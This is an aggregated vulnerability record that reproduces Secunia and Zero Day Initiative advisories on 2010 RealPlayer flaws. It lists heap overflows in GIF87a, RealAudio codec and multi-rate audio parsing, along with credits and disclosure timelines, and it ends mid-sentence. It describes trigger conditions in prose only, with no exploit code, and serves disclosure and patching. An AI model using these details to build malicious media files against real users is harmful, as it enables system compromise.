Heap-based buffer overflow in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.1, Mac RealPlayer 11.0 through 11.1, and Linux RealPlayer 11.0.2.1744 allows remote attackers to execute arbitrary code via a large Screen Width value in the Screen Descriptor header of a GIF87a file in an RTSP stream. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious media file.The specific flaw exists in the parsing of GIF87a files over the streaming protocol RTSP. When specifying a large Screen Width size in the Screen Descriptor header a calculation on the destination heap chunks size is improperly checked for overflow. This leads to a smaller buffer being allocated and subsequently a heap overflow when processing the received data. Exploitation of this vulnerability can lead to system compromise under the credentials of the currently logged in user.
Real Networks released an advisory regarding 27 security vulnerabilities in RealPlayer. Real Networks RealPlayer is prone to a heap overflow vulnerability because the software fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition.
This issue affects Windows RealPlayer SP 1.1.1 and prior, Mac RealPlayer 11.1.0.1116 and prior, Linux RealPlayer 11.0.2.1744 and prior.
NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
RealPlayer Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA38550
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/38550/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
RELEASE DATE:
2010-12-12
DISCUSS ADVISORY:
http://secunia.com/advisories/38550/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/38550/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in RealPlayer, which can
be exploited by malicious people to compromise a user's system.
1) An error exists when parsing RealAudio content encoded using the
"cook" codec. This can be exploited to trigger the use of
uninitialised memory and potentially cause a memory corruption via
e.g. a specially crafted RealMedia file.
2) An error in the handling of errors encountered while decoding
"cook"-encoded audio content can be exploited to trigger the use of
uninitialised memory and potentially free an arbitrary address.
3) An error in the parsing of AAC audio content can be exploited to
corrupt memory via specially crafted spectral data.
4) An array indexing error when parsing Media Properties Header
(MDPR) in a RealMedia file can be exploited to corrupt memory.
5) An input validation error when parsing a RealMedia file can be
exploited to cause a buffer overflow via a specially crafted
multi-rate audio stream.
6) An error in the processing of the "StreamTitle" tag in a SHOUTcast
stream using the ICY protocol can be exploited to cause an allocation
failure for heap memory, which can result in the usage of freed
pointers.
7) An integer overflow error when parsing a MLLT atom in an .AAC file
can be exploited to cause a buffer overflow.
8) An input validation error in the "pnen3260.dll" module in the
parsing of TIT2 atoms within AAC files can be exploited to corrupt
memory.
10) An error in the parsing of audio codec information in a Real
Audio media file can be exploited to to cause a heap-based buffer
overflow via a large number of subbands.
11) An input validation error in drv2.dll when decompressing RV20
video streams can be exploited to corrupt heap memory.
12) An unspecified error related to "SIPR" parsing can be exploited
to corrupt heap memory.
13) An unspecified error related to "SOUND" processing can be
exploited to corrupt heap memory.
14) An unspecified error related to "AAC" processing can be exploited
to corrupt heap memory.
15) An unspecified error related to "RealMedia" processing can be
exploited to corrupt heap memory.
16) An unspecified error related to "RA5" processing can be exploited
to corrupt heap memory.
17) An integer overflow in "drv1.dll" when parsing SIPR stream
metadata can be exploited to cause a heap-based buffer overflow, e.g.
via the RealPlayer ActiveX control.
18) An input validation error in the processing of RealMedia files
can be exploited to corrupt heap memory.
19) An input validation error in the RealAudio codec when processing
RealMedia files can be exploited to corrupt heap memory.
20) An error in the "HandleAction" method in the RealPlayer ActiveX
control allows users to download and execute scripts in the "Local
Zone".
21) Input sanitisation errors in the "Custsupport.html", "Main.html",
and "Upsell.htm" components can be exploited to inject arbitrary code
into the RealOneActiveXObject process and load unsafe controls.
23) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to cause a heap-based
buffer overflow via an invalid size for an embedded MDPR chunk.
24) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to corrupt heap memory
via an invalid number streams within the chunk.
25) An input validation error when parsing the RMX file format can be
exploited to cause a heap-based buffer overflow.
26) An error when decoding data for particular mime types within a
RealMedia file can be exploited to cause a heap-based buffer
overflow.
27) An error in the parsing of server headers can be exploited to
cause a heap-based buffer overflow via an image tag pointing to a
malicious server, which causes the player to fetch a remote file.
28) An error in the implementation of the Advanced Audio Coding
compression when decoding a conditional component of a data block
within an AAC frame can be exploited to corrupt memory.
SOLUTION:
Upgrade to RealPlayer 14.0.0 or later.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Alin Rad Pop, Secunia Research.
3) Carsten Eiram, Secunia Research.
4) Anonymous and Hossein Lotfi, reported via ZDI.
5 - 11, 20, 21) Anonymous, reported via ZDI.
12 - 14) The vendor credits Nicolas Joly, Vupen
15) The vendor credits Chaouki Bekrar, Vupen
17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs
18, 19) Omair, reported via iDefense.
22, 28) Damian Put, reported via ZDI.
23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team
lollersk8erz.
25) Sebastian Apelt, reported via ZDI.
26) Sebastian Apelt and Andreas Schmidt, reported via ZDI.
27) AbdulAziz Hariri, reported via ZDI.
ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2010-9/
http://secunia.com/secunia_research/2010-14/
http://secunia.com/secunia_research/2010-15/
RealNetworks:
http://service.real.com/realplayer/security/12102010_player/en/
http://realnetworksblog.com/?p=2216
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-268/
http://www.zerodayinitiative.com/advisories/ZDI-10-266/
http://www.zerodayinitiative.com/advisories/ZDI-10-270/
http://www.zerodayinitiative.com/advisories/ZDI-10-273/
http://www.zerodayinitiative.com/advisories/ZDI-10-269/
http://www.zerodayinitiative.com/advisories/ZDI-10-271/
http://www.zerodayinitiative.com/advisories/ZDI-10-272/
http://www.zerodayinitiative.com/advisories/ZDI-10-274/
http://www.zerodayinitiative.com/advisories/ZDI-10-275/
http://www.zerodayinitiative.com/advisories/ZDI-10-276/
http://www.zerodayinitiative.com/advisories/ZDI-10-277/
http://www.zerodayinitiative.com/advisories/ZDI-10-278/
http://www.zerodayinitiative.com/advisories/ZDI-10-279/
http://www.zerodayinitiative.com/advisories/ZDI-10-281/
http://www.zerodayinitiative.com/advisories/ZDI-10-280/
http://www.zerodayinitiative.com/advisories/ZDI-10-282/
http://www.zerodayinitiative.com/advisories/ZDI-10-267/
TippingPoint DVLabs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. ZDI-10-271: RealNetworks RealPlayer RTSP GIF Parsing Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-271
December 10, 2010
-- CVE ID:
CVE-2010-4376
-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)
-- Affected Vendors:
RealNetworks
-- Affected Products:
RealNetworks RealPlayer
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8308.
-- Vendor Response:
RealNetworks has issued an update to correct this vulnerability. More
details can be found at:
http://service.real.com/realplayer/security/12102010_player/en/
-- Disclosure Timeline:
2009-06-25 - Vulnerability reported to vendor
2010-12-10 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
| VAR-201012-0252 | CVE-2010-4375 | RealNetworks RealPlayer Multi-rate audio heap-based buffer overflow vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Heap-based buffer overflow in RealNetworks RealPlayer 11.0 through 11.1, Mac RealPlayer 11.0 through 11.1, Linux RealPlayer 11.0.2.1744, and possibly HelixPlayer 1.0.6 and other versions, allows remote attackers to execute arbitrary code via malformed multi-rate data in an audio stream. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists when parsing a RealMedia file containing a malformed multi-rate audio stream. The application explicitly trusts two 16-bit values in this data structure which are then used to calculate the size used for an allocation.
Real Networks released an advisory regarding 27 security vulnerabilities in RealPlayer. Real Networks RealPlayer is prone to heap overflow vulnerability because the software fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition.
This issue affects Windows RealPlayer 11.1 and prior, Mac RealPlayer 11.1.0.1116 and prior, Linux RealPlayer 11.0.2.1744 and prior.
NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. RealNetworks RealNetworks RealPlayer is a set of media player products developed by RealNetworks in the United States. The product provides features for downloading/converting videos (in web pages), editing videos, managing media files, and more. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
RealPlayer Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA38550
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/38550/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
RELEASE DATE:
2010-12-12
DISCUSS ADVISORY:
http://secunia.com/advisories/38550/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/38550/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in RealPlayer, which can
be exploited by malicious people to compromise a user's system.
1) An error exists when parsing RealAudio content encoded using the
"cook" codec. This can be exploited to trigger the use of
uninitialised memory and potentially cause a memory corruption via
e.g. a specially crafted RealMedia file.
2) An error in the handling of errors encountered while decoding
"cook"-encoded audio content can be exploited to trigger the use of
uninitialised memory and potentially free an arbitrary address.
3) An error in the parsing of AAC audio content can be exploited to
corrupt memory via specially crafted spectral data.
4) An array indexing error when parsing Media Properties Header
(MDPR) in a RealMedia file can be exploited to corrupt memory.
6) An error in the processing of the "StreamTitle" tag in a SHOUTcast
stream using the ICY protocol can be exploited to cause an allocation
failure for heap memory, which can result in the usage of freed
pointers.
7) An integer overflow error when parsing a MLLT atom in an .AAC file
can be exploited to cause a buffer overflow.
8) An input validation error in the "pnen3260.dll" module in the
parsing of TIT2 atoms within AAC files can be exploited to corrupt
memory.
9) An integer overflow in the parsing of GIF87a files over the
streaming protocol RTSP can be exploited to cause a buffer overflow
via a large "Screen Width" size in the "Screen Descriptor" header.
10) An error in the parsing of audio codec information in a Real
Audio media file can be exploited to to cause a heap-based buffer
overflow via a large number of subbands.
11) An input validation error in drv2.dll when decompressing RV20
video streams can be exploited to corrupt heap memory.
12) An unspecified error related to "SIPR" parsing can be exploited
to corrupt heap memory.
13) An unspecified error related to "SOUND" processing can be
exploited to corrupt heap memory.
14) An unspecified error related to "AAC" processing can be exploited
to corrupt heap memory.
15) An unspecified error related to "RealMedia" processing can be
exploited to corrupt heap memory.
16) An unspecified error related to "RA5" processing can be exploited
to corrupt heap memory.
17) An integer overflow in "drv1.dll" when parsing SIPR stream
metadata can be exploited to cause a heap-based buffer overflow, e.g.
via the RealPlayer ActiveX control.
18) An input validation error in the processing of RealMedia files
can be exploited to corrupt heap memory.
19) An input validation error in the RealAudio codec when processing
RealMedia files can be exploited to corrupt heap memory.
20) An error in the "HandleAction" method in the RealPlayer ActiveX
control allows users to download and execute scripts in the "Local
Zone".
21) Input sanitisation errors in the "Custsupport.html", "Main.html",
and "Upsell.htm" components can be exploited to inject arbitrary code
into the RealOneActiveXObject process and load unsafe controls.
23) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to cause a heap-based
buffer overflow via an invalid size for an embedded MDPR chunk.
24) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to corrupt heap memory
via an invalid number streams within the chunk.
25) An input validation error when parsing the RMX file format can be
exploited to cause a heap-based buffer overflow.
27) An error in the parsing of server headers can be exploited to
cause a heap-based buffer overflow via an image tag pointing to a
malicious server, which causes the player to fetch a remote file.
28) An error in the implementation of the Advanced Audio Coding
compression when decoding a conditional component of a data block
within an AAC frame can be exploited to corrupt memory.
SOLUTION:
Upgrade to RealPlayer 14.0.0 or later.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Alin Rad Pop, Secunia Research.
3) Carsten Eiram, Secunia Research.
4) Anonymous and Hossein Lotfi, reported via ZDI.
5 - 11, 20, 21) Anonymous, reported via ZDI.
12 - 14) The vendor credits Nicolas Joly, Vupen
15) The vendor credits Chaouki Bekrar, Vupen
17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs
18, 19) Omair, reported via iDefense.
22, 28) Damian Put, reported via ZDI.
23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team
lollersk8erz.
25) Sebastian Apelt, reported via ZDI.
26) Sebastian Apelt and Andreas Schmidt, reported via ZDI.
27) AbdulAziz Hariri, reported via ZDI.
ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2010-9/
http://secunia.com/secunia_research/2010-14/
http://secunia.com/secunia_research/2010-15/
RealNetworks:
http://service.real.com/realplayer/security/12102010_player/en/
http://realnetworksblog.com/?p=2216
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-268/
http://www.zerodayinitiative.com/advisories/ZDI-10-266/
http://www.zerodayinitiative.com/advisories/ZDI-10-270/
http://www.zerodayinitiative.com/advisories/ZDI-10-273/
http://www.zerodayinitiative.com/advisories/ZDI-10-269/
http://www.zerodayinitiative.com/advisories/ZDI-10-271/
http://www.zerodayinitiative.com/advisories/ZDI-10-272/
http://www.zerodayinitiative.com/advisories/ZDI-10-274/
http://www.zerodayinitiative.com/advisories/ZDI-10-275/
http://www.zerodayinitiative.com/advisories/ZDI-10-276/
http://www.zerodayinitiative.com/advisories/ZDI-10-277/
http://www.zerodayinitiative.com/advisories/ZDI-10-278/
http://www.zerodayinitiative.com/advisories/ZDI-10-279/
http://www.zerodayinitiative.com/advisories/ZDI-10-281/
http://www.zerodayinitiative.com/advisories/ZDI-10-280/
http://www.zerodayinitiative.com/advisories/ZDI-10-282/
http://www.zerodayinitiative.com/advisories/ZDI-10-267/
TippingPoint DVLabs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. ZDI-10-266: RealNetworks RealPlayer Multi-Rate Audio Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-266
December 10, 2010
-- CVE ID:
CVE-2010-4375
-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)
-- Affected Vendors:
RealNetworks
-- Affected Products:
RealNetworks RealPlayer
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8441.
-- Vendor Response:
RealNetworks has issued an update to correct this vulnerability. More
details can be found at:
http://service.real.com/realplayer/security/12102010_player/en/
-- Disclosure Timeline:
2009-04-15 - Vulnerability reported to vendor
2010-12-10 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
| VAR-201012-0248 | CVE-2010-4387 | RealNetworks RealPlayer of RealAudio Vulnerability in arbitrary code execution in codec |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
The RealAudio codec in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.4, Mac RealPlayer 11.0 through 12.0.0.1444, and Linux RealPlayer 11.0.2.1744 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a crafted audio stream in a RealMedia file. Real Networks RealPlayer is prone to a memory-corruption vulnerability because the software fails to perform adequate boundary-checks on user-supplied data.
Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will result in a denial-of-service condition.
This issue affects Windows RealPlayer SP 1.1.4 and prior, Mac RealPlayer 12.0.0.1379 and prior, and Linux RealPlayer 11.0.2.1744 and prior.
NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
RealPlayer Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA38550
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/38550/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
RELEASE DATE:
2010-12-12
DISCUSS ADVISORY:
http://secunia.com/advisories/38550/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/38550/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in RealPlayer, which can
be exploited by malicious people to compromise a user's system.
1) An error exists when parsing RealAudio content encoded using the
"cook" codec. This can be exploited to trigger the use of
uninitialised memory and potentially cause a memory corruption via
e.g. a specially crafted RealMedia file.
2) An error in the handling of errors encountered while decoding
"cook"-encoded audio content can be exploited to trigger the use of
uninitialised memory and potentially free an arbitrary address.
3) An error in the parsing of AAC audio content can be exploited to
corrupt memory via specially crafted spectral data.
4) An array indexing error when parsing Media Properties Header
(MDPR) in a RealMedia file can be exploited to corrupt memory.
5) An input validation error when parsing a RealMedia file can be
exploited to cause a buffer overflow via a specially crafted
multi-rate audio stream.
6) An error in the processing of the "StreamTitle" tag in a SHOUTcast
stream using the ICY protocol can be exploited to cause an allocation
failure for heap memory, which can result in the usage of freed
pointers.
7) An integer overflow error when parsing a MLLT atom in an .AAC file
can be exploited to cause a buffer overflow.
8) An input validation error in the "pnen3260.dll" module in the
parsing of TIT2 atoms within AAC files can be exploited to corrupt
memory.
9) An integer overflow in the parsing of GIF87a files over the
streaming protocol RTSP can be exploited to cause a buffer overflow
via a large "Screen Width" size in the "Screen Descriptor" header.
10) An error in the parsing of audio codec information in a Real
Audio media file can be exploited to to cause a heap-based buffer
overflow via a large number of subbands.
11) An input validation error in drv2.dll when decompressing RV20
video streams can be exploited to corrupt heap memory.
12) An unspecified error related to "SIPR" parsing can be exploited
to corrupt heap memory.
13) An unspecified error related to "SOUND" processing can be
exploited to corrupt heap memory.
14) An unspecified error related to "AAC" processing can be exploited
to corrupt heap memory.
15) An unspecified error related to "RealMedia" processing can be
exploited to corrupt heap memory.
16) An unspecified error related to "RA5" processing can be exploited
to corrupt heap memory.
17) An integer overflow in "drv1.dll" when parsing SIPR stream
metadata can be exploited to cause a heap-based buffer overflow, e.g.
via the RealPlayer ActiveX control.
18) An input validation error in the processing of RealMedia files
can be exploited to corrupt heap memory.
19) An input validation error in the RealAudio codec when processing
RealMedia files can be exploited to corrupt heap memory.
20) An error in the "HandleAction" method in the RealPlayer ActiveX
control allows users to download and execute scripts in the "Local
Zone".
21) Input sanitisation errors in the "Custsupport.html", "Main.html",
and "Upsell.htm" components can be exploited to inject arbitrary code
into the RealOneActiveXObject process and load unsafe controls.
22) A boundary error in the parsing of cook-specific data used for
initialization can be exploited to cause a heap-based buffer
overflow.
23) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to cause a heap-based
buffer overflow via an invalid size for an embedded MDPR chunk.
24) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to corrupt heap memory
via an invalid number streams within the chunk.
25) An input validation error when parsing the RMX file format can be
exploited to cause a heap-based buffer overflow.
26) An error when decoding data for particular mime types within a
RealMedia file can be exploited to cause a heap-based buffer
overflow.
27) An error in the parsing of server headers can be exploited to
cause a heap-based buffer overflow via an image tag pointing to a
malicious server, which causes the player to fetch a remote file.
28) An error in the implementation of the Advanced Audio Coding
compression when decoding a conditional component of a data block
within an AAC frame can be exploited to corrupt memory.
SOLUTION:
Upgrade to RealPlayer 14.0.0 or later.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Alin Rad Pop, Secunia Research.
3) Carsten Eiram, Secunia Research.
4) Anonymous and Hossein Lotfi, reported via ZDI.
5 - 11, 20, 21) Anonymous, reported via ZDI.
12 - 14) The vendor credits Nicolas Joly, Vupen
15) The vendor credits Chaouki Bekrar, Vupen
17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs
18, 19) Omair, reported via iDefense.
22, 28) Damian Put, reported via ZDI.
23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team
lollersk8erz.
25) Sebastian Apelt, reported via ZDI.
26) Sebastian Apelt and Andreas Schmidt, reported via ZDI.
27) AbdulAziz Hariri, reported via ZDI.
ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2010-9/
http://secunia.com/secunia_research/2010-14/
http://secunia.com/secunia_research/2010-15/
RealNetworks:
http://service.real.com/realplayer/security/12102010_player/en/
http://realnetworksblog.com/?p=2216
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-268/
http://www.zerodayinitiative.com/advisories/ZDI-10-266/
http://www.zerodayinitiative.com/advisories/ZDI-10-270/
http://www.zerodayinitiative.com/advisories/ZDI-10-273/
http://www.zerodayinitiative.com/advisories/ZDI-10-269/
http://www.zerodayinitiative.com/advisories/ZDI-10-271/
http://www.zerodayinitiative.com/advisories/ZDI-10-272/
http://www.zerodayinitiative.com/advisories/ZDI-10-274/
http://www.zerodayinitiative.com/advisories/ZDI-10-275/
http://www.zerodayinitiative.com/advisories/ZDI-10-276/
http://www.zerodayinitiative.com/advisories/ZDI-10-277/
http://www.zerodayinitiative.com/advisories/ZDI-10-278/
http://www.zerodayinitiative.com/advisories/ZDI-10-279/
http://www.zerodayinitiative.com/advisories/ZDI-10-281/
http://www.zerodayinitiative.com/advisories/ZDI-10-280/
http://www.zerodayinitiative.com/advisories/ZDI-10-282/
http://www.zerodayinitiative.com/advisories/ZDI-10-267/
TippingPoint DVLabs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. BACKGROUND
RealPlayer is RealNetworks's media player product used to render video
and other media. For more information, visit http://www.real.com/.
II.
The vulnerability specifically exists in the way RealPlayer handles
specially crafted RealMedia files using RealAudio codec.
III. To exploit this
vulnerability, an attacker must persuade a victim into using RealPlayer
to open a specially crafted media file. This could be accomplished by
either direct link or referenced from a website under the attacker's
